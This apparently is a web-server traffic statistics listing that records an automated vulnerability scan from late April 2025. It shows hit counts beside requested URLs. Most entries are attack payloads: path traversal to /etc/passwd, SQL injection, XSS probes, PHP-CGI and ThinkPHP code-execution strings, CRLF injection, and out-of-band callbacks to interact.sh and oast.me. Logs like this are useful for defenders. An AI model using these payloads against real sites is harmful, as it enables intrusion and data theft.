29 Apr/28/25 2:46 AM  /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?page=....//....//etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?mnu=login
29 Apr/28/25 2:46 AM  /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?page_slug=../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?module=Install&view=Index
29 Apr/28/25 2:46 AM  /index.php?redirect=//interact.sh
29 Apr/28/25 2:46 AM  /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index="><script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?toast=</script><script>alert(document.cookie)%3B</script>
29 Apr/28/25 2:47 AM  /index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql sql='select md5(999999999)'
29 Apr/28/25 2:46 AM  /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?q=hiring&search=URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19--+
29 Apr/28/25 2:45 AM  /index.php?owa_do=base.loginForm
29 Apr/28/25 2:46 AM  /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?page=....//....//windows/win.ini
29 Apr/28/25 2:46 AM  /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?/installer
29 Apr/28/25 2:47 AM  /index.php?g=g&m=Door&a=index&content=<?php echo md5('ThinkCMF');
29 Apr/28/25 2:47 AM  /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
29 Apr/28/25 2:46 AM  /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip"><script>alert(document.domain)</script>jgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member
29 Apr/28/25 2:46 AM  /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?option=com_departments&id=-1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--
29 Apr/28/25 2:47 AM  /index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs[x][search]=gx3vt onfocus=alert(document.domain) autofocus= itkrzsug7w5
29 Apr/28/25 2:46 AM  /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
29 Apr/28/25 2:46 AM  /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(document.domain)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1
29 Apr/28/25 2:46 AM  /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?q=file:///etc/passwd
29 Apr/28/25 2:47 AM  /index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,md5(999999999),0x7e),1)
29 Apr/28/25 2:46 AM  /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?s=example
29 Apr/28/25 2:47 AM  /index.php?s=/index/index/name/${@phpinfo()}
29 Apr/28/25 2:46 AM  /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?download=/etc/passwd
29 Apr/28/25 2:47 AM  /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
29 Apr/28/25 2:46 AM  /index.php?option=com_imagebrowser&folder=../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?page=home
29 Apr/28/25 2:47 AM  /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM  /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:45 AM  /index.php?action=Login&module=Users
29 Apr/28/25 2:46 AM  /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image
29 Apr/28/25 2:46 AM  /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/
29 Apr/28/25 2:46 AM  /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:45 AM  /index.php?route=account/login
29 Apr/28/25 2:46 AM  /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?SQ=0&srch=x\"+onmouseover%3Dalert(1)+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0
29 Apr/28/25 2:47 AM  /index.php?page=etc/passwd
29 Apr/28/25 2:46 AM  /index.php?m=search&c=index&a=initxqb4n<img src%3da onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes
29 Apr/28/25 2:46 AM  /index.php?msg=</script><script>alert(document.cookie)%3B</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?redirect=http://www.interact.sh
29 Apr/28/25 2:46 AM  /index.php?op=fileviewer&file=/etc/passwd
29 Apr/28/25 2:47 AM  /index.php?s=/install/index/index
29 Apr/28/25 2:46 AM  /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?currentpath=<script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM  /index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&sort=latest&page=index.php&format=xml&task=showproducts&view=med&sortdir='
29 Apr/28/25 2:47 AM  /index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index="><script>alert(document.domain)</script>
29 Apr/28/25 2:46 AM  /index.php?v=d&p=";alert(document.domain);"
29 Apr/28/25 2:46 AM  /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:47 AM  /index.php?q=result&searchfor=advancesearch
29 Apr/28/25 2:46 AM  /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
29 Apr/28/25 2:46 AM  /index.php?r=i/../../../../../etc/passwd
27 Apr/14/25 12:57 AM  /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)
22 Apr/28/25 2:47 AM  /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%e2%80%99%e2%80%99%26type%3d
22 Apr/28/25 2:47 AM  /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910')+OR+6100%3d6100#%26type%3d
10 Apr/28/25 2:46 AM  /index.php?search=1af"+onclick%3D'alert(document.domain)'
10 Apr/28/25 2:46 AM  /index.php?p=member&destination
10 Apr/28/25 2:47 AM  /index.php?destination="><script>alert(document.domain)</script>&p=member
232 0.20%Apr/28/25 2:47 AM/webmail/
29 0.02%Apr/28/25 2:46 AM  /webmail/?language="><img src%3Dx onerror%3Dalert(document.domain)>
29 0.02%Apr/28/25 2:47 AM  /webmail/?language="><img src%3Dx onerror%3Dalert(1)>
29 0.02%Apr/28/25 2:47 AM  /webmail/?color="><img src=x onerror=confirm(document.cookie)>
29 0.02%Apr/28/25 2:46 AM  /webmail/?color="><svg/onload=alert(document.domain)>"
29 0.02%Apr/28/25 2:47 AM  /webmail/?color=\"><img+src=x+onerror=confirm(document.domain)>
29 0.02%Apr/28/25 2:47 AM  /webmail/?color="><img src onerror%3dalert(document.domain)><"'
145 0.01%Apr/28/25 2:47 AM/admin/login.php
87 Apr/28/25 2:46 AM/index.php/login
87 Apr/28/25 2:47 AM/index.php/install
58 0.05%Apr/28/25 2:46 AM/webmail/old/calendar/minimizer/index.php
29 0.03%Apr/28/25 2:46 AM  /webmail/old/calendar/minimizer/index.php?script=..././..././..././..././..././..././..././..././..././..././etc/passwd
29 0.03%Apr/28/25 2:46 AM  /webmail/old/calendar/minimizer/index.php?style=..././..././..././..././..././..././..././..././..././..././etc/passwd
58 0.05%Apr/28/25 2:46 AM/webmail/calendar/minimizer/index.php
29 0.03%Apr/28/25 2:46 AM  /webmail/calendar/minimizer/index.php?style=..\..\..\..\..\..\..\..\/etc\passwd
29 0.03%Apr/28/25 2:46 AM  /webmail/calendar/minimizer/index.php?style=..\..\..\..\..\..\..\..\windows\win.ini
58 0.05%Apr/28/25 2:47 AM/webmail/basic/
29 0.03%Apr/28/25 2:46 AM  /webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password&_a[signup]=1
58 Apr/28/25 2:47 AM/index.php/bbs/index/download
58 Apr/28/25 2:47 AM  /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
58 Apr/28/25 2:47 AM/index.php/install/
38 Apr/28/25 2:47 AM/index.php/Home/login/
29 Apr/28/25 2:46 AM/index.php/interact.sh
29 Apr/28/25 2:46 AM/index.php/component/jemessenger/box_details
29 Apr/28/25 2:46 AM  /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd
29 0.02%Apr/28/25 2:45 AM/webmail/src/login.php
29 0.02%Apr/28/25 2:47 AM/webmail/logs/sendmail.log
29 0.02%Apr/28/25 2:47 AM/webmail/logs/errors
29 Apr/28/25 2:47 AM/index.php/gm5rj"><script>alert(document.domain)</script>bwude
29 Apr/28/25 2:47 AM  /index.php/gm5rj"><script>alert(document.domain)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
29 Apr/28/25 2:45 AM/index.php/admin/admin/login/index/
29 Apr/28/25 2:46 AM/index.php/component/chronoforums2/profiles/avatar/u1
29 Apr/28/25 2:46 AM  /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd
29 Apr/28/25 2:47 AM/index.php/_profiler/empty/search/results
29 Apr/28/25 2:47 AM  /index.php/_profiler/empty/search/results?limit=10
29 Apr/28/25 2:47 AM/index.php/javascript%26colon%3Balert(document.domain)
29 0.02%Apr/28/25 2:47 AM/webmail/logs/sendmail
29 Apr/28/25 2:47 AM/%0ASet-Cookie:crlfinjection/..
29 Apr/28/25 2:47 AM/index.php/index/install
29 Apr/28/25 2:46 AM/index.php/admin/filemanager/sa/getZipFile
29 Apr/28/25 2:46 AM  /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
29 Apr/28/25 2:46 AM/index.php/Pan/ShareUrl/downloadSharedFile
29 Apr/28/25 2:46 AM  /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini
29 0.02%Apr/28/25 2:47 AM/webmail
29 Apr/28/25 2:47 AM/index.php/Home/uploadify/fileList
29 Apr/28/25 2:47 AM  /index.php/Home/uploadify/fileList?type=.+&path=../../../
29 Apr/28/25 2:44 AM/api/v1
29 Apr/28/25 2:44 AM/api/v2
29 Apr/28/25 2:45 AM/mailman/listinfo
29 0.02%Apr/28/25 2:45 AM/webmail/login/
29 0.02%Apr/28/25 2:47 AM/webmail/logs/errors.log
29 Apr/28/25 2:45 AM/index.php/session/login
25 Apr/28/25 2:50 AM/index.php/management/set_timezone
22 Apr/28/25 2:46 AM/index.php/User/doLogin
20 Apr/28/25 2:47 AM/index.php/index/user/setLocale/NEW_LOCALE
20 Apr/28/25 2:47 AM  /index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me
176999.45%Apr/30/25 11:34 AM[not listed: 1,679 files]